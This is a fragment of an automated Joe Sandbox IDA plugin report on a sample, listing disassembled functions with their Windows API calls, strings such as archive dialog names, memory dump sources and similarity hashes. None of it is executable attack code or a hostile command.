                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E21BBB294024CAEDF20EEA4CD05FDF7BACAF0A700F040516F911965A2E775D645EF52
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E85
                                                                                                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E8F
                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FAAC5A,00000008,?,00000000,?,00FAD22D,?,00000000), ref: 00FB0E9F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Thread pool initialization failed., xrefs: 00FB0EB7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                                                                                                              • Opcode ID: 40e2a5e6e4409e131c3f2490b2103ee637dfbf20734855705774df446176f627
                                                                                                                                                                                              • Instruction ID: e83b454bd1bc7d5d956d824f0091490007aeae37031d4b924ab665522a6c3bd1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40e2a5e6e4409e131c3f2490b2103ee637dfbf20734855705774df446176f627
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE1151B1A447089FC3215F7A9C849A7FBECEB55754F14482EF1DAC3200DA719940AB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FA1316: GetDlgItem.USER32(00000000,00003021), ref: 00FA135A
                                                                                                                                                                                                • Part of subcall function 00FA1316: SetWindowTextW.USER32(00000000,00FD35F4), ref: 00FA1370
                                                                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00FBB2BE
                                                                                                                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FBB2D6
                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00FBB304
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                                                                              • API String ID: 445417207-3292211884
                                                                                                                                                                                              • Opcode ID: b7f91e8c564bfa304e8e3fb5d4ff7aac1a0143a8d7ce3df475c0a5e75a2bea23
                                                                                                                                                                                              • Instruction ID: 86800e0a5a27a00538380c4ac22e6d704b5c381606aa4dfdfed205725e08d907
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f91e8c564bfa304e8e3fb5d4ff7aac1a0143a8d7ce3df475c0a5e75a2bea23
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A11E132900218BADB239A669D49FFF7B6CEF0A710F040020FA45B6084C7E99905ABA1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                              • API String ID: 0-56093855
                                                                                                                                                                                              • Opcode ID: 450d1226d5be585f94bf580b0e9f95f25a81e2b8f9ea1dca8a591f2e54fda12c
                                                                                                                                                                                              • Instruction ID: 970c4b2feea63bd119a98b06e4f042bddd741a0573f5bd81d0d95ebd2265d25e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 450d1226d5be585f94bf580b0e9f95f25a81e2b8f9ea1dca8a591f2e54fda12c
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF01B536904289AFD711DF56FC84A967FA9F74C394B000025F545C7271D6319850FFA2
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                              • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                                                                              • Instruction ID: b439bc26ca2eb9467b68c998dd6a4c00512cfa093e0074fb9f3c4d3e39e57552
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                                                                              • Instruction Fuzzy Hash: 38A14872D086879FE711CF18CA87FAEBBE5EF51320F1841ADE4859B281C6B89D41E750
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FA7F69,?,?,?), ref: 00FAA3FA
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FA7F69,?), ref: 00FAA43E
                                                                                                                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FA7F69,?,?,?,?,?,?,?), ref: 00FAA4BF
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00FA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FAA4C6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2287278272-0
                                                                                                                                                                                              • Opcode ID: 428753878615020b0f42bed28365924965559dcad585830ceeecce6f55af9b70
                                                                                                                                                                                              • Instruction ID: 7bddef75586c693d53ac47fb9eab1a371f8efb07ce0d33005eb2e0c164eaa427
                                                                                                                                                                                              • Opcode Fuzzy Hash: 428753878615020b0f42bed28365924965559dcad585830ceeecce6f55af9b70
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2041F0B16483819AD731DF24DC49FEEBBE4AB86310F04091DB5D1D3190D7A99A0CEB53
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 176396367-0
                                                                                                                                                                                              • Opcode ID: 2ea439877ad57e334ba2508df2d4ffe39c3d77211f8e43860cd1a770156e4265
                                                                                                                                                                                              • Instruction ID: ca58dc171c602b40248380d2549bf1065cbf756beaa2285245f02eb4afcf3667
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ea439877ad57e334ba2508df2d4ffe39c3d77211f8e43860cd1a770156e4265
                                                                                                                                                                                              • Instruction Fuzzy Hash: E941B4B190066A5BCB22DF688D56AEF7BB8EF01310F014019F945F7245DE34AE598BA4
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FC91E0,?,00000000,?,00000001,?,?,00000001,00FC91E0,?), ref: 00FCC9D5
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FCCA5E
                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC6CBE,?), ref: 00FCCA70
                                                                                                                                                                                              • __freea.LIBCMT ref: 00FCCA79
                                                                                                                                                                                                • Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                              • Opcode ID: 8669f18c1f8e2523b9688e999b35ec39f9eff07ac86a217ff3d482ee541c25d3
                                                                                                                                                                                              • Instruction ID: 573df37a4e3ca08c27b73fc8b8bc02da904dfd3102d235c000978eaff5bf5fdf
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8669f18c1f8e2523b9688e999b35ec39f9eff07ac86a217ff3d482ee541c25d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0431AE72A0020BABDB25DF75CD56EAE7BA5EB41320B04422DFC08E6250E739DD50EBD0
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00FBA666
                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00FBA675
                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FBA683
                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00FBA691
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                              • Opcode ID: 8396f778fcf9f20d4451a708c309c6f8c37dce3323a91bd0aea9c4647bceabb9
                                                                                                                                                                                              • Instruction ID: 114d9fa95a23733bd7af48015c803fa8ed83a4caade0c38164675639b087ea62
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8396f778fcf9f20d4451a708c309c6f8c37dce3323a91bd0aea9c4647bceabb9
                                                                                                                                                                                              • Instruction Fuzzy Hash: EBE0EC71943721AFD273AB61AC5DB8B3E54FB05B92F014111FB499E1C4DB6984018BA1
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FBA699: GetDC.USER32(00000000), ref: 00FBA69D
                                                                                                                                                                                                • Part of subcall function 00FBA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FBA6A8
                                                                                                                                                                                                • Part of subcall function 00FBA699: ReleaseDC.USER32(00000000,00000000), ref: 00FBA6B3
                                                                                                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00FBA83C
                                                                                                                                                                                                • Part of subcall function 00FBAAC9: GetDC.USER32(00000000), ref: 00FBAAD2
                                                                                                                                                                                                • Part of subcall function 00FBAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FBAB01
                                                                                                                                                                                                • Part of subcall function 00FBAAC9: ReleaseDC.USER32(00000000,?), ref: 00FBAB99
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                              • API String ID: 1061551593-3887548279
                                                                                                                                                                                              • Opcode ID: f9c568c9041e199b1f67aba5d0349f1dd6b04ec7379ff1e10b347f8041c1ccb2
                                                                                                                                                                                              • Instruction ID: 49d67d718581c22d8c95c95a55fe60cc1766036842918e29441b15e7555bd71f
                                                                                                                                                                                              • Opcode Fuzzy Hash: f9c568c9041e199b1f67aba5d0349f1dd6b04ec7379ff1e10b347f8041c1ccb2
                                                                                                                                                                                              • Instruction Fuzzy Hash: EF910FB1608344AFD621DF26C844A6BBBE9FFC9701F00491EF59AD7260DB31A905DF62
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA75E3
                                                                                                                                                                                                • Part of subcall function 00FB05DA: _wcslen.LIBCMT ref: 00FB05E0
                                                                                                                                                                                                • Part of subcall function 00FAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FAA598
                                                                                                                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FA777F
                                                                                                                                                                                                • Part of subcall function 00FAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA501
                                                                                                                                                                                                • Part of subcall function 00FAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FAA325,?,?,?,00FAA175,?,00000001,00000000,?,?), ref: 00FAA532
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                              • API String ID: 3226429890-336475711
                                                                                                                                                                                              • Opcode ID: 568986d4666049e9f5f66bee106d690e07edaca7931266eb5d19e9cef89340fd
                                                                                                                                                                                              • Instruction ID: f0997d6cc8a0c2521c2bb4d784868b232aa4d24bb7fb41bd52ba1adcb2d8be75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 568986d4666049e9f5f66bee106d690e07edaca7931266eb5d19e9cef89340fd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C4173B1804258A9EB25EB64CC56EDEB77DAF46300F0440A6B605A2192DB785F84EF71
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                              • String ID: }
                                                                                                                                                                                              • API String ID: 176396367-4239843852
                                                                                                                                                                                              • Opcode ID: aeff5c3fc732620db668ae9fb48521509b74a7583067b7e1ba6d7fb209db8c79
                                                                                                                                                                                              • Instruction ID: 5539574648e5279724f20c5445f485aa5fcc87b2f5f73557b80d71aa29e51243
                                                                                                                                                                                              • Opcode Fuzzy Hash: aeff5c3fc732620db668ae9fb48521509b74a7583067b7e1ba6d7fb209db8c79
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6221D4729043065AD731EA65DD45FAAB3ECDF91760F08042AF540C3145E7A9DD48ABA3
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FAF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FAF2E4
                                                                                                                                                                                                • Part of subcall function 00FAF2C5: GetProcAddress.KERNEL32(00FE81C8,CryptUnprotectMemory), ref: 00FAF2F4
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,00FAF33E), ref: 00FAF3D2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • CryptUnprotectMemory failed, xrefs: 00FAF3CA
                                                                                                                                                                                              • CryptProtectMemory failed, xrefs: 00FAF389
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                              • API String ID: 2190909847-396321323
                                                                                                                                                                                              • Opcode ID: 6e9417272c21694b4fc7bd97f1b37becfb5cacf99e30d3e80fdcc71167b56e16
                                                                                                                                                                                              • Instruction ID: 7b7b241522c7def3449e2970c3dc51ea4f22e9bff2c0e77f9304e7977400f32e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e9417272c21694b4fc7bd97f1b37becfb5cacf99e30d3e80fdcc71167b56e16
                                                                                                                                                                                              • Instruction Fuzzy Hash: 911156B1A01328ABDF11AF71DC41A2E3755FF02771B04812AFC069F291CA389D06B792
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _swprintf.LIBCMT ref: 00FAB9B8
                                                                                                                                                                                                • Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                              • String ID: %c:\
                                                                                                                                                                                              • API String ID: 1543624204-3142399695
